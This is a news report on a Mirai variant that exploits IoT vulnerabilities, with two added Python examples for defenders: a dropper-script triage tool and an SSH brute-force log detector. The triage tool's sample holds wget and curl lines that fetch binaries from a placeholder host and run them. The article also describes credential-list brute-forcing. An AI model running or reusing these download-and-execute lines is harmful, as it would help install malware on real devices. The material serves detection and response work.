
New Mirai variant spotted targeting network devices

Palo Alto researchers claim exploit code for ten vulnerabilities has been used so far

Security researchers have discovered another Mirai variant that is targeting new Internet of Things (IoT) vulnerabilities. 

According to a blog post by researchers at Palo Alto Networks' Unit 42 Threat Intelligence Team, the attacks were first observed in mid-February. One IP address involved in the attack was updated to serve a Mirai variant leveraging CVE-2021-27561 and CVE-2021-27562, just hours after vulnerability details were published.

Earlier this month, the same samples were served from a third IP address, with the addition of an exploit leveraging CVE-2021-22502. At the tail end of last week, an exploit targeting CVE-2020-26919 was also incorporated into the samples.

The researchers said that the attacks are also using three other IoT vulnerabilities yet to be identified. These include two remote command execution vulnerabilities against unknown targets, and a vulnerability used by Moobot in the past.

In all of the attacks, hackers use the wget utility to download a shell script from the malware infrastructure. The shell script then downloads several Mirai binaries compiled for different architectures and executes these downloaded binaries one by one.
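The download-and-execute chain described above (a shell script fetched with wget, which then pulls one binary per CPU architecture and runs each in turn) is a recognisable pattern that a responder can look for when triaging a captured script. The following is an added example, not code from IT Pro or from Unit 42: it summarises a constructed dropper script in that style, extracting the download hosts for blocking and flagging the multi-architecture download-then-execute shape. The host 203.0.113.10 and the file names are placeholders I made up, not indicators from the article.

```python
import re
from urllib.parse import urlparse

# Constructed sample in the style the article describes: one binary per
# architecture, each downloaded, made executable, run, then deleted.
# 203.0.113.10 is a documentation-range placeholder, not a real indicator.
SAMPLE_DROPPER = """#!/bin/sh
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://203.0.113.10/bins/dark.arm -O dark.arm; chmod +x dark.arm; ./dark.arm; rm -rf dark.arm
wget http://203.0.113.10/bins/dark.mips -O dark.mips; chmod +x dark.mips; ./dark.mips; rm -rf dark.mips
curl -O http://203.0.113.10/bins/dark.x86; chmod 777 dark.x86; ./dark.x86; rm -rf dark.x86
wget http://203.0.113.10/lolol.sh -O lolol.sh; sh lolol.sh
"""

# A benign script for comparison: it downloads nothing and runs nothing it fetched.
SAMPLE_BENIGN = """#!/bin/sh
apt-get update
apt-get install -y htop
"""

# File-name suffixes that usually name a target architecture in IoT droppers.
ARCH_HINTS = {"arm", "arm5", "arm6", "arm7", "mips", "mipsel", "x86",
              "x86_64", "ppc", "sh4", "m68k", "spc"}
URL_RE = re.compile(r"https?://[^\s;'\"]+")
DOWNLOAD_RE = re.compile(r"\b(wget|curl|tftp)\b")
# Either "./something" after a separator, or "sh something.sh".
EXEC_RE = re.compile(r"(^|[;&|]\s*)\./[\w.\-]+|\bsh\s+[\w./\-]+\.sh")


def triage_dropper(script_text):
    """Summarise a captured shell script: which hosts it downloads from, which
    architectures it fetches binaries for, and how many lines chain a download
    straight into execution."""
    hosts, archs, chained = set(), set(), 0
    for raw in script_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        for url in URL_RE.findall(line):
            parsed = urlparse(url)
            if parsed.hostname:
                hosts.add(parsed.hostname)
            # Guess the architecture from the basename suffix, e.g. dark.mips -> mips.
            base = parsed.path.rsplit("/", 1)[-1]
            suffix = base.rsplit(".", 1)[-1].lower() if "." in base else ""
            if suffix in ARCH_HINTS:
                archs.add(suffix)
        if DOWNLOAD_RE.search(line) and EXEC_RE.search(line):
            chained += 1
    return {
        "download_hosts": sorted(hosts),          # candidates for a blocklist
        "architectures": sorted(archs),
        "download_then_execute_lines": chained,
        # Two or more architectures plus repeated download->execute is the
        # multi-arch dropper shape; a single download is not enough on its own.
        "looks_like_multiarch_dropper": len(archs) >= 2 and chained >= 2,
    }


if __name__ == "__main__":
    print(triage_dropper(SAMPLE_DROPPER))
    print(triage_dropper(SAMPLE_BENIGN))
```

The verdict deliberately requires both signals (several architectures and repeated download-then-execute), because a legitimate installer may well download one file and run it; it is the fan-out across CPU types that is characteristic of IoT worms that do not know in advance what device they have landed on.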

In addition to downloading Mirai, other malicious shell scripts have also been discovered.

“The attacks are still ongoing at the time of this writing. Upon successful exploitation, the attackers try to download a malicious shell script, which contains further infection behaviors such as downloading and executing Mirai variants and brute-forcers,” said Palo Alto Networks. 

After a successful attack, the attackers then download other binaries to schedule jobs, create filter rules, carry out brute-force attacks, or spread the malware.

Among these is lolol.sh, which downloads the “dark” binaries and schedules a job to run every hour and rerun the lolol.sh script.

“However, the cron configuration is incorrect. This would have been an attempt to ensure the process is re-launched in case it crashes or is killed for some other reason,” said researchers.

Install.sh downloads GoLang v1.9.4 onto the target system and adds it to the system path. It also downloads “nbrute” binaries and a “combo.txt” file. Nbrute.[arch] mainly serves the purpose of brute-forcing SSH logins to a given IP address using the credential pairs found in “combo.txt”.

Combo.txt is a plain text file containing numerous combinations of credentials (often default credentials on devices). Dark.[arch] is a binary based on the Mirai codebase, and mainly serves the purpose of propagation, or brute-forcing SSH connections using some hard-coded credentials in the binary.
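The brute-force stage described in the last few paragraphs (nbrute working through the credential pairs in combo.txt over SSH, and the dark binaries spreading with hard-coded credentials) has a clear footprint on the receiving side: a burst of failed sshd logins from one source, cycling through many usernames, sometimes followed by a success. The following is an added example, not code from IT Pro or from Unit 42: it parses constructed OpenSSH auth-log lines and raises an alert when one source IP produces a dense burst of failures across several usernames, noting whether a successful login followed. The IPs 198.51.100.7 and 203.0.113.5, the hostname and the log year are placeholders I made up.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed auth.log lines in OpenSSH's format: one source tries a list of
# default accounts in quick succession and finally gets in; a second host is a
# normal user who mistypes once. Both IPs are documentation-range placeholders.
SAMPLE_AUTH_LOG = """\
Mar  9 10:00:01 gw sshd[1201]: Failed password for root from 198.51.100.7 port 51012 ssh2
Mar  9 10:00:02 gw sshd[1203]: Failed password for invalid user admin from 198.51.100.7 port 51014 ssh2
Mar  9 10:00:02 gw sshd[1205]: Failed password for invalid user support from 198.51.100.7 port 51016 ssh2
Mar  9 10:00:03 gw sshd[1207]: Failed password for invalid user user from 198.51.100.7 port 51018 ssh2
Mar  9 10:00:04 gw sshd[1209]: Failed password for invalid user guest from 198.51.100.7 port 51020 ssh2
Mar  9 10:00:05 gw sshd[1211]: Accepted password for admin from 198.51.100.7 port 51022 ssh2
Mar  9 10:03:00 gw sshd[1300]: Failed password for alice from 203.0.113.5 port 40000 ssh2
Mar  9 10:03:10 gw sshd[1302]: Accepted publickey for alice from 203.0.113.5 port 40002 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<mon>\w{3})\s+(?P<day>\d{1,2}) (?P<time>\d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?:password|publickey) for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>[\d.]+) port \d+"
)


def parse_events(log_text, year=2021):
    """Return (timestamp, ip, user, failed) tuples. Syslog lines carry no year,
    so one is supplied; 2021 is an assumption for the constructed sample."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not a login result line
        ts = datetime.strptime(f"{year} {m['mon']} {int(m['day']):02d} {m['time']}",
                               "%Y %b %d %H:%M:%S")
        events.append((ts, m["ip"], m["user"], m["result"] == "Failed"))
    return events


def detect_bruteforce(log_text, window_seconds=60, min_failures=4, min_distinct_users=3):
    """Alert per source IP on the densest burst of failures inside a sliding
    window that also spans several usernames (the credential-list signature)."""
    by_ip = defaultdict(list)
    for ev in parse_events(log_text):
        by_ip[ev[1]].append(ev)
    alerts = []
    for ip, evs in by_ip.items():
        evs.sort()
        failures = [e for e in evs if e[3]]
        best, j = None, 0
        for i, (ts, _, _, _) in enumerate(failures):
            # Advance the window start until it is within window_seconds of ts.
            while (ts - failures[j][0]).total_seconds() > window_seconds:
                j += 1
            burst = failures[j:i + 1]
            users = {e[2] for e in burst}
            if len(burst) >= min_failures and len(users) >= min_distinct_users:
                if best is None or len(burst) > best["failures"]:
                    best = {"ip": ip, "failures": len(burst),
                            "distinct_users": sorted(users),
                            "window_start": burst[0][0], "window_end": ts}
        if best:
            # A success from the same source at or after the burst means one of
            # the tried credentials worked and the host needs containment.
            best["success_after_burst"] = any(
                not e[3] and e[0] >= best["window_end"] for e in evs)
            alerts.append(best)
    return alerts


if __name__ == "__main__":
    for alert in detect_bruteforce(SAMPLE_AUTH_LOG):
        print(alert)
```

Requiring several distinct usernames, not just a failure count, separates a combo-list sweep from a single user who forgot a password; the success_after_burst flag is what turns a noisy "someone is scanning" alert into an incident.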

"The IoT realm remains an easily accessible target for attackers. Many vulnerabilities are very easy to exploit and could, in some cases, have catastrophic consequences," the researchers added.
